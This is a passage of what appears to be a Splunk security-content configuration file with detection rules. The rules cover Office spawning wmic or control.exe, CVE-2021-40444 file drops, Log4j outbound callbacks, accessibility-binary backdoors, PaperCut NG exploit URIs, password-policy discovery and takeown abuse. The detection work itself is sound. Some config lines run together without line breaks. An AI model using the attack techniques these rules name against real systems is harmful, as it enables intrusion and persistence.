action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following detection identifies the latest behavior utilized by the Ursnif malware family. This detection identifies any Windows Office Product spawning `wmic.exe`. In malicious instances, the command-line of `wmic.exe` will contain `wmic process call create`. In addition, Threat Research has released a detection identifying the use of `wmic process call create` on the command-line of `wmic.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product or `wmic.exe` will have reached out to a remote destination; capture and block the IPs or domain. Review additional parallel processes for further activity.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = No false positives known. Filter as needed.
action.escu.creation_date = 2023-07-11
action.escu.modification_date = 2023-07-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Product Spawning Wmic - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spearphishing Attachments", "FIN7", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"]
action.risk = 1
action.risk.param._risk_message = Office parent process $parent_process_name$ spawned a suspicious child process $process_name$ with process id $process_id$ on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Product Spawning Wmic - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "FIN7", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following detection identifies the latest behavior utilized by the Ursnif malware family. This detection identifies any Windows Office Product spawning `wmic.exe`. In malicious instances, the command-line of `wmic.exe` will contain `wmic process call create`. In addition, Threat Research has released a detection identifying the use of `wmic process call create` on the command-line of `wmic.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product or `wmic.exe` will have reached out to a remote destination; capture and block the IPs or domain. Review additional parallel processes for further activity.
action.notable.param.rule_title = Office Product Spawning Wmic
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe","Graph.exe","winproj.exe") `process_wmic` by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_product_spawning_wmic_filter`

[ESCU - Office Product Writing cab or inf - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies behavior related to CVE-2021-40444, where the malicious document loads ActiveX and downloads the remote payload (.inf, .cab). During triage, review parallel processes and further activity on the endpoint to identify additional patterns. Retrieve the file modifications and analyze further.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies behavior related to CVE-2021-40444, where the malicious document loads ActiveX and downloads the remote payload (.inf, .cab). During triage, review parallel processes and further activity on the endpoint to identify additional patterns. Retrieve the file modifications and analyze further.
action.escu.how_to_implement = To successfully implement this search you need to be ingesting process information that includes the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node and `Filesystem` node.
action.escu.known_false_positives = The query is structured in a way that `action` (read, create) is not defined. Review the results of this query, filter, and tune as necessary. It may be necessary to generate this query specific to your endpoint product.
action.escu.creation_date = 2023-02-15
action.escu.modification_date = 2023-02-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Product Writing cab or inf - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spearphishing Attachments", "Microsoft MSHTML Remote Code Execution CVE-2021-40444"]
action.risk = 1
action.risk.param._risk_message = An instance of $process_name$ was identified on $dest$ writing an inf or cab file to disk. This is not typical of $process_name$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Product Writing cab or inf - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Microsoft MSHTML Remote Code Execution CVE-2021-40444"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-40444"], "impact": 80, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies behavior related to CVE-2021-40444, where the malicious document loads ActiveX and downloads the remote payload (.inf, .cab). During triage, review parallel processes and further activity on the endpoint to identify additional patterns. Retrieve the file modifications and analyze further.
action.notable.param.rule_title = Office Product Writing cab or inf
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","wordpad.exe","wordview.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe") by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest Processes.process_guid | `drop_dm_object_name(Processes)` | rename process_guid as proc_guid | join proc_guid, _time [ | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*.inf","*.cab") by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid | `drop_dm_object_name(Filesystem)` | rename process_guid as proc_guid | fields _time dest file_create_time file_name file_path process_name process_path process proc_guid] | dedup file_create_time | table dest, process_name, process, file_create_time, file_name, file_path, proc_guid | `office_product_writing_cab_or_inf_filter`

[ESCU - Office Spawning Control - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following detection identifies control.exe spawning from an Office product. This detection identifies any Windows Office Product spawning `control.exe`. In malicious instances, the command-line of `control.exe` will contain a file path to a .cpl or .inf, related to CVE-2021-40444. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. Review parallel and child processes to identify further suspicious behavior.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following detection identifies control.exe spawning from an Office product. This detection identifies any Windows Office Product spawning `control.exe`. In malicious instances, the command-line of `control.exe` will contain a file path to a .cpl or .inf, related to CVE-2021-40444. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. Review parallel and child processes to identify further suspicious behavior.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited false positives should be present.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Spawning Control - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spearphishing Attachments", "Microsoft MSHTML Remote Code Execution CVE-2021-40444"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ after a suspicious attachment was opened.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Spawning Control - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Microsoft MSHTML Remote Code Execution CVE-2021-40444"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-40444"], "impact": 80, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following detection identifies control.exe spawning from an Office product. This detection identifies any Windows Office Product spawning `control.exe`. In malicious instances, the command-line of `control.exe` will contain a file path to a .cpl or .inf, related to CVE-2021-40444. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. Review parallel and child processes to identify further suspicious behavior.
action.notable.param.rule_title = Office Spawning Control
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","wordpad.exe","wordview.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe") Processes.process_name=control.exe by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_spawning_control_filter`

[ESCU - Outbound Network Connection from Java Using Default Ports - Rule]
action.escu = 0
action.escu.enabled = 1
description = A required step while exploiting the CVE-2021-44228 (Log4j) vulnerability is that the victim server will perform outbound connections to attacker-controlled infrastructure. This is required as part of the JNDI lookup as well as for retrieving the second stage .class payload. The following analytic identifies the Java process reaching out to default ports used by the LDAP and RMI protocols. This behavior could represent successful exploitation. Note that adversaries can easily decide to use arbitrary ports for these protocols and potentially bypass this detection.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint", "Network_Traffic"]
action.escu.eli5 = A required step while exploiting the CVE-2021-44228 (Log4j) vulnerability is that the victim server will perform outbound connections to attacker-controlled infrastructure. This is required as part of the JNDI lookup as well as for retrieving the second stage .class payload. The following analytic identifies the Java process reaching out to default ports used by the LDAP and RMI protocols. This behavior could represent successful exploitation. Note that adversaries can easily decide to use arbitrary ports for these protocols and potentially bypass this detection.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Legitimate Java applications may perform outbound connections to these ports. Filter as needed.
action.escu.creation_date = 2022-06-28
action.escu.modification_date = 2022-06-28
action.escu.confidence = high
action.escu.full_search_name = ESCU - Outbound Network Connection from Java Using Default Ports - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Log4Shell CVE-2021-44228"]
action.risk = 1
action.risk.param._risk_message = Java performed outbound connections to default ports of LDAP or RMI on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Outbound Network Connection from Java Using Default Ports - Rule
action.correlationsearch.annotations = {"analytic_story": ["Log4Shell CVE-2021-44228"], "cis20": ["CIS 10"], "confidence": 60, "cve": ["CVE-2021-44228"], "impact": 90, "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = A required step while exploiting the CVE-2021-44228 (Log4j) vulnerability is that the victim server will perform outbound connections to attacker-controlled infrastructure. This is required as part of the JNDI lookup as well as for retrieving the second stage .class payload. The following analytic identifies the Java process reaching out to default ports used by the LDAP and RMI protocols. This behavior could represent successful exploitation. Note that adversaries can easily decide to use arbitrary ports for these protocols and potentially bypass this detection.
action.notable.param.rule_title = Outbound Network Connection from Java Using Default Ports
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where (Processes.process_name="java.exe" OR Processes.process_name="javaw.exe") by _time Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where (All_Traffic.dest_port=389 OR All_Traffic.dest_port=636 OR All_Traffic.dest_port=1389 OR All_Traffic.dest_port=1099) by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as connection_to_CNC] | table _time dest parent_process_name process_name process_path process connection_to_CNC dest_port | `outbound_network_connection_from_java_using_default_ports_filter`

[ESCU - Overwriting Accessibility Binaries - Rule]
action.escu = 0
action.escu.enabled = 1
description = Microsoft Windows contains accessibility features that can be launched with a key combination before a user has logged in. An adversary can modify or replace these programs so they can get a command prompt or backdoor without logging in to the system. This search looks for modifications to these binaries.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546", "T1546.008"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = Microsoft Windows contains accessibility features that can be launched with a key combination before a user has logged in. An adversary can modify or replace these programs so they can get a command prompt or backdoor without logging in to the system. This search looks for modifications to these binaries.
action.escu.how_to_implement = You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint file-system data model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.
action.escu.known_false_positives = Microsoft may provide updates to these binaries. Verify that these changes do not correspond with your normal software update cycle.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Overwriting Accessibility Binaries - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation", "Flax Typhoon"]
action.risk = 1
action.risk.param._risk_message = A suspicious file modification or replacement of $file_path$ on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Overwriting Accessibility Binaries - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation", "Flax Typhoon"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546", "T1546.008"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Microsoft Windows contains accessibility features that can be launched with a key combination before a user has logged in. An adversary can modify or replace these programs so they can get a command prompt or backdoor without logging in to the system. This search looks for modifications to these binaries. action.notable.param.rule_title = Overwriting Accessibility Binaries action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem where (Filesystem.file_path=*\\Windows\\System32\\sethc.exe* OR Filesystem.file_path=*\\Windows\\System32\\utilman.exe* OR Filesystem.file_path=*\\Windows\\System32\\osk.exe* OR Filesystem.file_path=*\\Windows\\System32\\Magnify.exe* OR Filesystem.file_path=*\\Windows\\System32\\Narrator.exe* OR Filesystem.file_path=*\\Windows\\System32\\DisplaySwitch.exe* OR Filesystem.file_path=*\\Windows\\System32\\AtBroker.exe*) by Filesystem.file_name Filesystem.dest | `drop_dm_object_name(Filesystem)` | 
`security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `overwriting_accessibility_binaries_filter` [ESCU - PaperCut NG Suspicious Behavior Debug Log - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following hunting analytic is designed to monitor and detect potential exploitation attempts targeting a PaperCut NG server by analyzing its debug log data. By focusing on public IP addresses accessing the PaperCut NG instance, this analytic aims to identify unauthorized or suspicious access attempts. Furthermore, it searches for specific URIs that have been discovered in the proof of concept code, which are associated with known exploits or vulnerabilities. The analytic is focused on the user admin. Regex is used mainly because the log is not parsed by Splunk and there is no TA for this debug log. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting analytic is designed to monitor and detect potential exploitation attempts targeting a PaperCut NG server by analyzing its debug log data. By focusing on public IP addresses accessing the PaperCut NG instance, this analytic aims to identify unauthorized or suspicious access attempts. Furthermore, it searches for specific URIs that have been discovered in the proof of concept code, which are associated with known exploits or vulnerabilities. The analytic is focused on the user admin. 
Regex is used mainly because the log is not parsed by Splunk and there is no TA for this debug log.
action.escu.how_to_implement = Debug logs must be enabled and shipped to Splunk in order to properly identify behavior with this analytic.
action.escu.known_false_positives = False positives may be present, as this is based on the admin user accessing the Papercut NG instance from a public IP address. Filter as needed.
action.escu.creation_date = 2023-05-15
action.escu.modification_date = 2023-05-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - PaperCut NG Suspicious Behavior Debug Log - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["PaperCut MF NG Vulnerability"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - PaperCut NG Suspicious Behavior Debug Log - Rule
action.correlationsearch.annotations = {"analytic_story": ["PaperCut MF NG Vulnerability"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `papercutng` (loginType=Admin OR userName=admin) | eval uri_match=if(match(_raw, "(?i)(\/app\?service=page\/SetupCompleted|\/app|\/app\?service=page\/PrinterList|\/app\?service=direct\/1\/PrinterList\/selectPrinter&sp=l1001|\/app\?service=direct\/1\/PrinterDetails\/printerOptionsTab\.tab)"), "URI matches", null()) | eval ip_match=if(match(_raw,
"(?i)((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))") AND NOT match(_raw, "(?i)(10\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|(172\.(1[6-9]|2[0-9]|3[0-1])\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|(192\.168\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))"), "IP matches", null()) | where (isnotnull(uri_match) OR isnotnull(ip_match)) | stats sparkline, count, values(uri_match) AS uri_match, values(ip_match) AS ip_match latest(_raw) BY host, index, sourcetype | `papercut_ng_suspicious_behavior_debug_log_filter`

[ESCU - Password Policy Discovery with Net - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `net.exe` or `net1.exe` with command line arguments used to obtain the domain password policy. Red Teams and adversaries may leverage `net.exe` for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `net.exe` or `net1.exe` with command line arguments used to obtain the domain password policy. Red Teams and adversaries may leverage `net.exe` for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions.
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-08-26
action.escu.modification_date = 2021-08-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Password Policy Discovery with Net - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Password Policy Discovery with Net - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe" OR Processes.process_name="net1.exe") AND Processes.process = "*accounts*" AND Processes.process = "*/domain*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id
Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `password_policy_discovery_with_net_filter`

[ESCU - Permission Modification using Takeown App - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a modification of file or directory permissions using the takeown.exe Windows application. This technique was seen in some ransomware that takes ownership of a folder or files in order to encrypt or delete them.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects a modification of file or directory permissions using the takeown.exe Windows application. This technique was seen in some ransomware that takes ownership of a folder or files in order to encrypt or delete them.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = takeown.exe is a normal Windows application that may be used by network operators.
action.escu.creation_date = 2021-06-10
action.escu.modification_date = 2021-06-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Permission Modification using Takeown App - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware", "Sandworm Tools"]
action.risk = 1
action.risk.param._risk_message = A suspicious execution of $process_name$ with process id $process_id$ and command line $process$ to modify permissions of a directory or files on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Permission Modification using Takeown App - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Sandworm Tools"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects a modification of file or directory permissions using the takeown.exe Windows application. This technique was seen in some ransomware that takes ownership of a folder or files in order to encrypt or delete them.
action.notable.param.rule_title = Permission Modification using Takeown App
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "takeown.exe" Processes.process = "*/f*" by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `permission_modification_using_takeown_app_filter`

[ESCU - PetitPotam Network Share Access Request - Rule]
action.escu = 0
action.escu.enabled = 1
